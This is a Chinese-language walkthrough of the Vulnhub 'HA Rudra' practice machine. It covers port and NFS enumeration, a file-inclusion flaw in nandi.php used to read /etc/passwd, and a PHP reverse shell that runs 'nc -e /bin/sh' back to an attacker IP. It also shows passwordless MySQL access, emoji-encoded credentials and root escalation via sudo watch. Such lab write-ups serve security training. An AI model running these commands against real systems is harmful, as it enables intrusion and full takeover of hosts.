HA Rudra靶机渗透教学文档

1. 靶机介绍

• 下载地址: Vulnhub HA Rudra
• 关键提示: "ENUMERATION IS THE KEY!!!!!" (枚举是关键)
• 靶机IP: 10.8.0.100

2. 初始信息收集

端口扫描

使用nmap进行端口扫描:

nmap -sV -p- 10.8.0.100

发现开放多个端口，重点关注:

• 111端口: sunrpc协议，运行rpcbind服务
• 2049端口: NFS服务

NFS服务利用

1. 检查NFS共享:

showmount -e 10.8.0.100

2. 挂载NFS共享:

mkdir /mnt/rudra
mount -t nfs 10.8.0.100:/ /mnt/rudra

3. 查看共享内容:

cd /mnt/rudra
ls -la

发现mahadev.txt文件，内容提示用户名可能是"rudra"

3. Web应用渗透

目录扫描

使用工具如dirb、gobuster或wfuzz扫描web目录:

gobuster dir -u http://10.8.0.100 -w /path/to/wordlist.txt

发现robots.txt文件，其中提到nandi.php

文件包含漏洞利用

1. 测试nandi.php是否存在文件包含漏洞:

wfuzz -c -w /path/to/params.txt --hh 0 http://10.8.0.100/nandi.php?FUZZ=/etc/passwd

2. 确认参数为file后，读取系统文件:

curl http://10.8.0.100/nandi.php?file=/etc/passwd

3. 通过文件包含读取/home/shivay/mahadev.txt获取更多信息

4. 获取初始shell

上传反弹shell

1. 在挂载的NFS目录中创建PHP反弹shell:

echo '<?php system("nc -e /bin/sh 攻击机IP 4444"); ?>' > /mnt/rudra/home/shivay/shell.php

2. 本地开启监听:

nc -lvnp 4444

3. 通过文件包含执行反弹shell:

curl http://10.8.0.100/nandi.php?file=/home/shivay/shell.php

升级为交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

5. 数据库渗透

MySQL访问

1. 查找MySQL配置文件:

find / -name "*mysql*" -type f 2>/dev/null

2. 发现无密码root账户:

mysql -u root -p

(直接回车，无需密码)

3. 查看数据库内容:

show databases;
use mahadev;
show tables;
select * from mahadev;

获取提示"check media"

6. 凭证解密

查找媒体文件

cd /media
ls -la

发现creds和hints文件

Emoji表情解密

1. 将creds文件复制到本地:

scp creds 用户名@攻击机IP:/home/用户名/

2. 根据hints提示，使用Cloakify工具解密
3. 解密步骤:

cd Cloakify
chmod 777 -R noiseTools
python2 cloakify.py

选择:

• 2. Decloakify a File
• 输入creds文件路径
• 选择15) Emoji表情解密
  获得凭证: mahakaal:kalbhairav

7. 权限提升

切换用户

su mahakaal
密码: kalbhairav

检查sudo权限

sudo -l

发现可以以root权限运行/usr/bin/watch

利用watch提权

sudo /usr/bin/watch -x sh -c 'whoami'

如果失败，尝试通过SSH登录后执行:

ssh mahakaal@10.8.0.100
sudo /usr/bin/watch -x sh -c 'whoami'

成功获取root权限后读取flag

关键总结

1. 枚举是关键 - 全面扫描端口、服务、目录
2. NFS挂载提供了文件上传途径
3. 文件包含漏洞是初始突破点
4. 数据库无密码访问暴露关键信息
5. 非常规凭证(Emoji)需要特殊工具解密
6. sudo权限滥用是最终提权手段